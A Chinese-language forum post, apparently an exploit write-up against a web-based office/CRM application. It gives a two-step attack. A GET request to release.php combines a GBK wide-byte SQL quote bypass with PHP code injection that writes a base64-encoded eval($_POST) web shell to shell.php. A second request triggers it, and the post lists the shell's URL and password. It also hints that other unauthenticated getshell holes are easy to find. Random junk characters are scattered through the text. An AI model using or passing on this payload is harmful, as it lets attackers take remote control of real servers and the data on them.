此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.6 n( v: C6 g. w+ B1 x2 ?9 L
$ z* X" u- I& o4 H" v' A. e. J
8 K2 r0 s* U! ^! k! bEXP:
( U+ y" Q! d/ ]6 O0 i# P' W# y5 M 0 S& l* I4 L8 \
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
+ k8 o/ L9 y J$ {" P' U* @0 p% L ! A4 W, h1 ]8 T+ b8 Q) V5 t
第二步: [GET]http://site/general/email/index.php R1 F; {# g4 |7 C* O6 v
4 h. d! R1 ^- K& z: }5 }% _8 ?
SHELL: http://site/general/email/shell.php 密码C
. u3 w8 @; v3 U3 h: \/ P; } 8 o# E0 ^. q) Z. R
: S0 ~3 e( B/ X! X/ T此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好3 d& c2 `3 t) a' V! N! g( X
# c* u6 V" s5 Y8 R* r
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~8 {- _8 U6 S2 _, U/ v/ N+ {# w
4 K6 }! o2 H( o- r4 Z1 @/ w; {
& [9 f+ O3 d, k5 u$ H |